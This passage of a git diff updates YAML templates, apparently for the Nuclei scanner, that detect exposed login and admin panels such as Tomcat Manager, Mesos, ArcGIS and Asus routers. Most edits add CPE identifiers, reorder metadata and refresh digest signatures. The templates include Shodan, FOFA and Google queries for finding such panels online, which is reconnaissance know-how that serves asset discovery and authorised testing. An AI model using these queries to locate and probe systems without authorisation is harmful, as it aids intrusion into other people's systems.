cpe:2.3:a:apache:jmeter:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: apache product: jmeter shodan-query: title:"Apache JMeter Dashboard" + vendor: apache + verified: true tags: apache,jmeter,panel http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022020688c3f50ac6ec7e740748d7f25fe6935c5efd5ea9a4872eaf871dd1252465602201f4af12e35131b7a602fa6531f9f680fbb5803165dbc0812d5dc1b052e2f93c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb1037efc1fcc4364852312de1e209a9c5c8f63370a2aa20fe94a5769e4d1f1b022100bd3d0e91dac1f7227fa5ed97915b314c793c608f80806675bf6fcd2aaac8179c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index b506d99220..031a456b4a 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -7,11 +7,12 @@ info: description: An Apache APISIX login panel was detected. classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: apache - product: apisix fofa-query: title="Apache APISIX Dashboard" + max-request: 1 + product: apisix + vendor: apache tags: apache,apisix,panel http: @@ -29,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e70c65c7a775cef570163b9cb9df5f3d68c8ab129846bf21ead14131c0fdba3502210086945688d6c56581375ebca6079e1652ceee1b2cd9bdd79e83b5a718f2ea8c08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009511db3bd4110569d3adb76780b1eae709159c92d71b9fd0e0f3665aa25c65ef02210080459d36c4880e531941e8516355f1deb7e67881bc8a203be2cf734becaa4d4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/apache-mesos-panel.yaml b/http/exposed-panels/apache/apache-mesos-panel.yaml index 83d7336930..b482f4fd1b 100644 --- a/http/exposed-panels/apache/apache-mesos-panel.yaml +++ b/http/exposed-panels/apache/apache-mesos-panel.yaml @@ -7,15 +7,15 @@ info: description: Apache Mesos panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:mesos:*:*:*:*:jenkins:*:*:* metadata: - verified: true + fofa-query: app="APACHE-MESOS" max-request: 2 - vendor: apache product: mesos shodan-query: http.title:"Mesos" - fofa-query: app="APACHE-MESOS" + vendor: apache + verified: true tags: panel,apache,mesos http: @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010586bb8c2b7cd774bc09aa47c5a8495df09e34ca9a4bd8a19075972313e1f200221008a25f1e55c075a027af5a6c56b1293dfcdc4bb08e4c532f383aa2c42108a8233:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f9ad35c3dfc30dcfd03d982738cf7fc2177db2271595789a62aeadecfdc646b2022100bb27c79a50dd8db5a5a9423a629e2166c4757ea8e9962a89028005b0454d20b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apache/public-tomcat-manager.yaml b/http/exposed-panels/apache/public-tomcat-manager.yaml index 95ef6b062c..f7cd1ea593 100644 --- a/http/exposed-panels/apache/public-tomcat-manager.yaml +++ b/http/exposed-panels/apache/public-tomcat-manager.yaml @@ -7,13 +7,13 @@ info: description: Apache Tomcat Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 2 - vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + vendor: apache tags: panel,tomcat,apache http: @@ -36,4 +36,4 @@ http: - 401 - 200 condition: or -# digest: 4a0a0047304502204f72f032ab9e187d3278dc22161c65c56b9e3bc9d4687848a80db8c79b7686a2022100dc0d9be8baaf310f493f3d631aee680058d24362080843da5a34122c111512de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022051da4071917dfc40eb9d5739e05591234a77712988ef81a6e2817124c4d71e9002202bb604ba99eb68737e389afaf6b0abcee20c49f920ddd1a087b257c3716f9353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/apigee-panel.yaml b/http/exposed-panels/apigee-panel.yaml index 20f33c6936..bd38bff268 100644 --- a/http/exposed-panels/apigee-panel.yaml +++ b/http/exposed-panels/apigee-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://cloud.google.com/apigee?hl=en metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:"-839356603" + verified: true tags: panel,apigee,login http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'Version:?\s+([0-9.]+)' -# digest: 490a004630440220688a442d2442a84abe5045f8ed111f8ba36419f7f7ef8a557f7aac684b7a387702204f2fa7abd4fe51946fb0814b71b1efd662356095dfa93b3102bf6c679ef64ddc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022024de85a2064b59024b17d948274dc76df5c6bd4686e677536a0d2fecf1a4caeb022100de0d18e50fc7b9dd92022639756256b0c98e3a3db454035d1565be64993edccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appsmith-web-login.yaml b/http/exposed-panels/appsmith-web-login.yaml index 8f4afedc20..b28180205b 100644 --- a/http/exposed-panels/appsmith-web-login.yaml +++ b/http/exposed-panels/appsmith-web-login.yaml @@ -9,14 +9,14 @@ info: - https://www.appsmith.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:appsmith:appsmith:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: appsmith product: appsmith shodan-query: http.title:"appsmith" + vendor: appsmith + verified: true tags: panel,appsmith http: @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206d45bb530cfe37281b997a2dc2f64903424a0d8c2c6c747af3a0ab3271c385b302201c10a5e3474445e39af8c192fdf62cb4b3d3dcac24262deaed8ac48a63b97dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7b37c5f11fd7dd4e640706ad39c91ce1f95968e05549a1d3f23c41435625d62022067a75ce8709378d433fe824633e2fbc0596e3d3648681b856cd89fcbadb7dc2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appspace-panel.yaml b/http/exposed-panels/appspace-panel.yaml index 52a060ef87..f571068619 100644 --- a/http/exposed-panels/appspace-panel.yaml +++ b/http/exposed-panels/appspace-panel.yaml @@ -7,12 +7,14 @@ info: description: Appspace is the workplace experience platform for your whole team that lets you manage it all – from employee communications to your physical office spaces. reference: - https://www.appspace.com/ + classification: + cpe: cpe:2.3:a:appspace:appspace:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 3 - vendor: appspace product: appspace shodan-query: title:"Appspace" + vendor: appspace + verified: true tags: appspace,panel,detect http: @@ -42,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206a890af8b1229f17e88ea14f189ad370fbc1fd991e0ab1a8c86fdfc790d6f808022100e9c8a62f28479a1f96d14f5f755f3f5060242a11640c928c3b6ff34aa8ea404d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d0756e6e209352ea0ac90827c785e76a43448ce465c4a17674774cc59afecdff022100c126685413b98a7d183497b337ff43ddc5a39fa1bb9ea5b12f356761517fe22b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appsuite-panel.yaml b/http/exposed-panels/appsuite-panel.yaml index 17b5912610..b47bd4d72d 100644 --- a/http/exposed-panels/appsuite-panel.yaml +++ b/http/exposed-panels/appsuite-panel.yaml @@ -4,13 +4,15 @@ info: name: Appsuite Login Panel - Detect author: DhiyaneshDK severity: info + classification: + cpe: cpe:2.3:a:open-xchange:open-xchange_appsuite:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: open-xchange product: open-xchange_appsuite shodan-query: html:"Appsuite" - tags: panel,appsuite,detect + vendor: open-xchange + verified: true + tags: panel,appsuite,detect,open-xchange http: - method: GET @@ -32,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d3833a5bbb36893c9570c94dd2482d39db34ca2ea9414064f63c601af519ac8c02206080c31920d7915b8ab9c73b7b5f33c0ea0cb7d4390bec36c3ee9c569d188670:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220357235264a8080fbb79afab06fc6d88dfbf974dfc4e18971f90ba1f8a3a81e6e02203cf71150238153cc7029218157a44a4a7717a9b4b9cba32f4b45db904cfbe5d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/appwrite-panel.yaml b/http/exposed-panels/appwrite-panel.yaml index b956b5ae78..4329c6b34e 100644 --- a/http/exposed-panels/appwrite-panel.yaml +++ b/http/exposed-panels/appwrite-panel.yaml @@ -7,14 +7,14 @@ info: description: Appwrite login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 2 - vendor: appwrite product: appwrite shodan-query: http.favicon.hash:-633108100 + vendor: appwrite + verified: true tags: panel,appwrite,detect http: @@ -28,4 +28,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-633108100\" == mmh3(base64_py(body)))" -# digest: 4b0a00483046022100f93ac7c4f1b5ca97c57d959b47531ed78b307e7a9c0f64ff388a3c4bfa9d2c4b022100b39a981b65653ead42764d853ab3a29e71d59b9d7657ebd1f526b6480ed5bbd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f999f1d004f9ce9dc9aa7216e4b888b0638238feb67a00e5df42e973b6151590220347658bd3f22464e6f9c94f8121069d9aaeb9294ee6fe7407fb4e9eda4971527:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aptus-panel.yaml b/http/exposed-panels/aptus-panel.yaml index 6ce1f117fe..8e2616bac6 100644 --- a/http/exposed-panels/aptus-panel.yaml +++ b/http/exposed-panels/aptus-panel.yaml @@ -7,7 +7,6 @@ info: description: Aptus login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -29,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c499ba757f039b6d82d7caac6c771e7fb3cdaa033371b268551de0de8546709e02204f397d0d08b2372700300145d54f1f56dd2e40384021f1738335788ec7a968ad:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220640c761126337fc2830e60088a517d2dfb0f5f6713df24554e6b5d2a67e1820a02201dd18f81fff0bd007f61bbfa6cfeb2d714cd2769ac3e5a2e2c2ed5ca7a47d705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aqua-enterprise-panel.yaml b/http/exposed-panels/aqua-enterprise-panel.yaml index 2d60455d8c..45ed002380 100644 --- a/http/exposed-panels/aqua-enterprise-panel.yaml +++ b/http/exposed-panels/aqua-enterprise-panel.yaml @@ -10,13 +10,12 @@ info: - https://www.aquasec.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true + google-query: intitle:"Aqua Cloud Native Security Platform" max-request: 1 shodan-query: http.title:"Aqua Enterprise" || http.title:"Aqua Cloud Native Security Platform" - google-query: intitle:"Aqua Cloud Native Security Platform" + verified: true tags: panel,aqua,aquasec http: @@ -36,5 +35,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200717d62d9a90f09287228587392af5e08ffb4a147dc145f7d543fbc81fb7613202201cd04e748e9beaf4c957c2854941ed21c791188aeeb1dd39f6d7fb0243132808:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220593d2e3c0053ffb4805eb449e8128d62c48270b1f22b228bd3b55f66c19b5b3c0220671474cb61608750a9c4182d05be825663967cea331656a7048979a5a99a61c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arangodb-web-Interface.yaml b/http/exposed-panels/arangodb-web-Interface.yaml index d6742d9673..2b2ff1ee32 100644 --- a/http/exposed-panels/arangodb-web-Interface.yaml +++ b/http/exposed-panels/arangodb-web-Interface.yaml @@ -8,12 +8,14 @@ info: ArangoDB Web Interface was detected. reference: - https://www.arangodb.com/docs/stable/ + classification: + cpe: cpe:2.3:a:arangodb:arangodb:*:*:*:*:*:*:*:* metadata: - verified: "true" max-request: 1 - vendor: arangodb product: arangodb shodan-query: http.title:"ArangoDB Web Interface" + vendor: arangodb + verified: "true" tags: panel,arangodb,login http: @@ -30,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb08b8231d49bb6456e8fb52da40302af235e46637edce8411b2067412cb5a0d022069c4f9c7a3d47f53943b9bb7a31c5114d5e4e9a41dc2f3e62c1194310311df90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5e79f701c8ae32d77121cec5ed1e9fabae11c849f798f1618fdfb5fd5a6cbc0022100a47a6d129ae459f8744c509ad9ab8a9223417a903ab0781b9daf4114ca2edb09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arcgis/arcgis-panel.yaml b/http/exposed-panels/arcgis/arcgis-panel.yaml index 9faec90afb..3d7e132178 100644 --- a/http/exposed-panels/arcgis/arcgis-panel.yaml +++ b/http/exposed-panels/arcgis/arcgis-panel.yaml @@ -9,11 +9,12 @@ info: - https://enterprise.arcgis.com/en/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:esri:arcgis_enterprise:*:*:*:*:*:*:*:* metadata: max-request: 1 - vendor: esri product: arcgis_enterprise - tags: docs,arcgis,cms,panel + vendor: esri + tags: docs,arcgis,cms,panel,esri http: - method: GET @@ -43,5 +44,6 @@ http: part: body group: 2 regex: - - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' -# digest: 4b0a00483046022100d773a5849390dfe34e1dbd1eea48213a043488406bdc5613a1f32d60320ebf91022100b81f076faf691a71f07fcf21858019900b51e5eb7da33b26dc1e5c01c04a4fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t + ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' +# digest: 4a0a004730450220281ad388414a5d110cfd5a7c7e9785b4aadcb95d806f94ecc6259d78b8b79a04022100b1a6fb2363b60f1e9b677cf1f4cf12abd8088cd5b53a6659d95408c585b82bac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arcgis/arcgis-services.yaml b/http/exposed-panels/arcgis/arcgis-services.yaml index 0ebeba5ee8..df59cea6e3 100644 --- a/http/exposed-panels/arcgis/arcgis-services.yaml +++ b/http/exposed-panels/arcgis/arcgis-services.yaml @@ -7,13 +7,15 @@ info: description: Check for the existence of the "/arcgis/rest/services" path on an ArcGIS server. reference: - https://enterprise.arcgis.com/en/ + classification: + cpe: cpe:2.3:a:esri:arcgis_server:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: esri product: arcgis_server shodan-query: title:"ArcGIS" - tags: panel,arcgis,rest,api,detect + vendor: esri + verified: true + tags: panel,arcgis,rest,api,detect,esri http: - method: GET @@ -38,4 +40,4 @@ http: group: 1 regex: - 'Current Version:\s*<\/b>\s*([0-9.]+)' -# digest: 4b0a00483046022100a098cf3b3472bbc94ecc5e01a30e81321252b1e2aaa9dfd3fa2dbe15f76ac46002210087775392928656c8ed94592b4188564aa740aac93cedf497be32b3995c610e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dff450061a964e5a154028977c3f879fa27f91712b0b4f7e8295b07199618444022100a508425811e5aee07eab739f769239323b52761d47bdcb35bbe0a980dc972661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/archibus-webcentral-panel.yaml b/http/exposed-panels/archibus-webcentral-panel.yaml index c6fc641cf5..de30e0b585 100644 --- a/http/exposed-panels/archibus-webcentral-panel.yaml +++ b/http/exposed-panels/archibus-webcentral-panel.yaml @@ -9,14 +9,14 @@ info: - https://archibus.com/products/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:archibus:web_central:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 3 - vendor: archibus product: web_central shodan-query: http.favicon.hash:889652940 + vendor: archibus + verified: true tags: panel,archibus http: @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022033b7e40f651dc0c292ae1cbc7ed407cac8ac196782d702aa50934cadfb19a54f0221008d120327e368cc08ab8708653b20dad576b541b222f2284d23b945efc4575174:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043021f1cbba93982a7f1c97794f66bd60726effad52b19e796a50366f2c2ec0985c9022064cf1708246f9077607c98961aa4245a793af499d6e4440a25555aeb3d772788:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arcserve-panel.yaml b/http/exposed-panels/arcserve-panel.yaml index 58ac7ccb80..4b8a7cacf1 100644 --- a/http/exposed-panels/arcserve-panel.yaml +++ b/http/exposed-panels/arcserve-panel.yaml @@ -7,13 +7,15 @@ info: reference: - https://twitter.com/HunterMapping/status/1674267368359444480 - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe + classification: + cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: - verified: true + fofa-query: icon_hash="-1889244460" max-request: 1 - vendor: arcserve product: udp shodan-query: http.favicon.hash:-1889244460 - fofa-query: icon_hash="-1889244460" + vendor: arcserve + verified: true tags: panel,login,arcserve,detect http: @@ -33,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200c051923727ed4da25e5bb9062d24632112820760cc42ace377ab172ed66637f02206821597d73341a322e57831efb558156fb2fa2c02c4dc0c70ac23b3a80c99061:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1e920029ab223d47552ebb51dbe68e974dd8b2d064b34d4c511819d6ef5d04d022100f04b08386868b3f6308d464cf43873c86fe31c3302d64bb19cd4967ccbcf9037:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/arris-modem-detect.yaml b/http/exposed-panels/arris-modem-detect.yaml index 897e030df4..85b31d31f7 100644 --- a/http/exposed-panels/arris-modem-detect.yaml +++ b/http/exposed-panels/arris-modem-detect.yaml @@ -7,15 +7,15 @@ info: description: ARRIS Touchstone Telephony Modem status panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:h:commscope:dg3450:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: commscope product: dg3450 shodan-query: html:"phy.htm" - tags: panel,arris + vendor: commscope + verified: true + tags: panel,arris,commscope http: - method: GET @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a1f364ce716bc68a50d039ce835574c0704c6e3dcb6fdba4c0637586d5c1389602203e245cefcf7e5922e32da39a509f8bbcfb0a219e8cc31be88f8025663f9d9e54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dccbca94cbd8601eaf684ba7e8cd9a3c023eb761b8124e6c5491cb03d400e8c402202be17f19304f05c61e103be475a92d1aebf706122dc68b89bfb612b0edadccd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aspcms-backend-panel.yaml b/http/exposed-panels/aspcms-backend-panel.yaml index 4afdfd3479..81821166f4 100644 --- a/http/exposed-panels/aspcms-backend-panel.yaml +++ b/http/exposed-panels/aspcms-backend-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://github.com/GREENHAT7/pxplan/blob/main/goby_pocs/Aspcms_Backend_Leak.json metadata: - verified: true - max-request: 2 fofa-query: app="ASPCMS" + max-request: 2 + verified: true tags: panel,login,aspcms,admin http: @@ -36,5 +36,4 @@ http: - 'status_code_1 == 200 && contains(body_1,"alert(")' - 'status_code_2 == 200 && contains(body_2,"var txtUserName = document.getElementById(")' condition: and - -# digest: 4a0a0047304502202debdad65506ec15af6fee39811c3fd109cb9f35281bf2cb14d54177fb365814022100dd19eedb73707d20b90846da9a403691acb6f675f896bef496d64ddaa2746803:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e039d5a7adae4d72297ac42094fd0ef69bf43894b8e392c474c653a8ba5f09110220163fad65f1b2a8d7040ca2d3816646e2cd5ca043cdd6b6f52bcd745a5901750d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/aspect-control-panel.yaml b/http/exposed-panels/aspect-control-panel.yaml index c756fc3181..1ca2d40872 100644 --- a/http/exposed-panels/aspect-control-panel.yaml +++ b/http/exposed-panels/aspect-control-panel.yaml @@ -8,12 +8,11 @@ info: ASPECT Control Panel login was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: http.favicon.hash:1011076161 + verified: true tags: panel,aspect,login http: @@ -30,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022063319d61f78c901d63d84b0e550bafea9ab51b6ee1ee2a91d1b18648eac6077b02201728432bf7ad901f9a3ce1a60e2a51d7572b447bfb6b3046be4a662625c067ce:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022003b01b7a0cb3aea69d9387f0308471dc8631a24f86d76679f6b2534af32eb3d0022100a89383c9692a2869bd83300f5e97a97fadf8d6b6f1c3e6e5acedef11e8beb997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/asus-aicloud-panel.yaml b/http/exposed-panels/asus-aicloud-panel.yaml index baefc1809e..035b14eb56 100644 --- a/http/exposed-panels/asus-aicloud-panel.yaml +++ b/http/exposed-panels/asus-aicloud-panel.yaml @@ -8,9 +8,9 @@ info: reference: - https://www.asus.com/in/content/aicloud/ metadata: - verified: "true" max-request: 1 shodan-query: title:"AiCloud" + verified: "true" tags: panel,asus,aicloud,detect http: @@ -30,5 +30,4 @@ http: - 200 - 401 condition: or - -# digest: 4a0a0047304502206b920912bfdce6a5b01db3e340f9957c69a5421e041f9881b36ab8d75b6b7e14022100a5f6ce8d57c2d258e0b9d5045b6d62192cdef39b5a77e4d37cc8556b84006f20:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b633553cbf3cb807efd84cb1fe68e4e2290ce6d99d22b72d8a5d479da998ab2602202fb7f481cf9d2cd5f9d23ba28a929aec8e9f27efc893350ed71167bd8c75688e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/asus-router-panel.yaml b/http/exposed-panels/asus-router-panel.yaml index e783a8eaf6..50dfe3aca4 100644 --- a/http/exposed-panels/asus-router-panel.yaml +++ b/http/exposed-panels/asus-router-panel.yaml @@ -7,12 +7,11 @@ info: description: Asus router login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: 'Server: httpd/2.0 port:8080' + verified: true tags: panel,asus,router,iot http: @@ -31,5 +30,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221008d9f1e0aaf14ca4d2fc862e31e361b1afaf0b85ad996ce7b4253460d1e1eb29e02202d68b0ce5c6e86ec2f18dd8779004d53a39e7b6f309908b99f6b178ddf410e73:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f6b434b60dc9836ffb8ad6dc737740ac3dae892a6c1b2011c677ad36d518971602203e69a5a5f15b7f8db34d6885f7e6855faa46cac581126fdb7cbb92c9827145b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlantis-detect.yaml b/http/exposed-panels/atlantis-detect.yaml index f959167d3e..b8b0ab3df1 100644 --- a/http/exposed-panels/atlantis-detect.yaml +++ b/http/exposed-panels/atlantis-detect.yaml @@ -9,15 +9,15 @@ info: - https://github.com/runatlantis/atlantis classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 + cpe: cpe:2.3:a:runatlantis:atlantis:*:*:*:*:*:*:*:* metadata: - verified: true max-request: 1 - vendor: runatlantis product: atlantis shodan-query: http.favicon.hash:-1706783005 - tags: panel,atlantis + vendor: runatlantis + verified: true + tags: panel,atlantis,runatlantis http: - method: GET @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022047d7dbb6236c56dfa346b86b0a16de41253ffbfb3f728a7ae077c749d0a50358022100e759aa23132aaa204c61e418746018f81bf59be1c0aef955615650b85010fc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f82fc01481176024c052e1e298f7cffd05aaf1868b51e2cf87b6e0d0b6799cba02200bb85fcae7ccbc15a106bdb1d32dfe806412d78574a92c3565b72a0eebf329ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlassian-bamboo-panel.yaml b/http/exposed-panels/atlassian-bamboo-panel.yaml index 3faf916ca1..f09d8afd9b 100644 --- a/http/exposed-panels/atlassian-bamboo-panel.yaml +++ b/http/exposed-panels/atlassian-bamboo-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.atlassian.com/software/bamboo metadata: - verified: true max-request: 1 shodan-query: http.title:"Bamboo" + verified: true tags: panel,bamboo,login,detect http: @@ -41,4 +41,4 @@ http: regex: - 'version\s+([0-9A-Za-z\s\.]+)\s+-' - 'pvpVersion = "([a-z0-9.]+)";' -# digest: 4b0a00483046022100ece84998eb9793b9e2c73bac643c4cf195724becb28ccb35d37fad0066c4967b022100b75da45856fa8d90182181299882a1339a8ba78ccc81f4964c4754a16e3acf6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a964e7e553f1326fa41008524ff247a00a22f33e9f1dcebcafe996e8997d24d602210083a8c103431cac6bca37b6b353658618f0e3b3a61cf2996a975fa19b6070c6d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atlassian-crowd-panel.yaml b/http/exposed-panels/atlassian-crowd-panel.yaml index 2f9bafaca4..46d60c3106 100644 --- a/http/exposed-panels/atlassian-crowd-panel.yaml +++ b/http/exposed-panels/atlassian-crowd-panel.yaml @@ -9,11 +9,12 @@ info: - https://www.atlassian.com/ classification: cwe-id: CWE-200 + cpe: cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: atlassian - product: crowd category: sso + max-request: 1 + product: crowd + vendor: atlassian tags: panel,atlassian http: @@ -34,4 +35,4 @@ http: regex: - 'value="Version: ([\d.]+)' part: body -# digest: 4a0a00473045022100a1bb32fdb6681db6b5045dc961e150cca7399f9292a738c4750af3e10bb590d402207301a37582e1c8f82a0e20845f352a0a44ece037f7e70d85a2a3da38bdc5a9f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f39c24cb5ce289f93523706314f26143e647f2870b8e07ddc97f68737dc29de4022100847bb0dc2724fa1ebc1794605f863302695d0c5b95f360ee559a0c6d212a9986:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/atvise-login.yaml b/http/exposed-panels/atvise-login.yaml index 98c94c8046..b453a6c9c7 100644 --- a/http/exposed-panels/atvise-login.yaml +++ b/http/exposed-panels/atvise-login.yaml @@ -11,8 +11,8 @@ info: classification: cwe-id: CWE-200 metadata: - max-request: 1 google-query: intitle:"atvise - next generation" + max-request: 1 tags: panel,atvise,edb http: @@ -30,5 +30,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022046f45b5efda97b4cdca000812fadc3f9e67735dfea13628cedcb33d682f10d88022100d023c7886c9448dd94d6282fdd6f6e0f35b2e77e465ef7359e62e0812328d21c:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100837afb5096ac00840c45e91bc6c0c0b0932838628a6c226918c82da88cc05bb6022100d5ff3f90a83e3bfd685f78ed6e209c59cb907fa3367678813fb504cea7a4a33f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/audiobookshelf-panel.yaml b/http/exposed-panels/audiobookshelf-panel.yaml index 1e98a02333..47a1227c37 100644 --- 